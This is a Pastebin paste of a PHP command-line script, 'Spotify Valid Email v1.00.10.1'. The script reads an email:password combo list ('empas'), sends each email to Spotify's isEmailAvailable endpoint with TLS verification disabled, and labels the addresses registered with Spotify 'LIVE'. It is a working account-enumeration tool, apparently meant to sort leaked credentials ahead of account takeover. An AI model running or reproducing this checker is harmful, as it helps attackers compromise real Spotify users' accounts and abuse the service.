Advertisement
AlexaMP

Spotify Valid Email v1.00.10.1

May 25th, 2018
1,010
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.91 KB | None | 0 0
  1. <?php
  2.  
  3. // IMPORTANT!!!!!!
  4. // This script in php on cmd not on web version
  5. // thanks to support us
  6. // Created by AlexaMP
  7. // Recode by AlexaMP
  8. // Version 1.00.10.1
  9. // Uploaded at 25 MEI 2018
  10. // thanks to no deleting Copyright
  11.  
  12.  
  13.  
  14. $fh = fopen("list.txt", "r"); //ganti list.txt jadi empas mu
  15. while(true){
  16. $line = fgets($fh);
  17. if($line == null)break;
  18. $data = explode(":",$line); //ganti ':' sesuai deliminter empas kamu
  19. $email = $data['0'];
  20.  
  21. $c = curl_init();
  22. curl_setopt($c, CURLOPT_URL, 'https://www.spotify.com/id/xhr/json/isEmailAvailable.php?email=' . $email);
  23. curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
  24. curl_setopt($c, CURLOPT_SSL_VERIFYHOST, false);
  25. curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
  26. curl_setopt($c, CURLOPT_FOLLOWLOCATION,true);
  27. $cekme = curl_exec($c);
  28. curl_close($c);
  29. if($cekme == "false")
  30. {
  31.     echo "LIVE => $email
  32. ";
  33. }else{
  34.     echo "DIE => $email
  35. ";
  36. }
  37. }
  38. fclose($fh);
  39. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement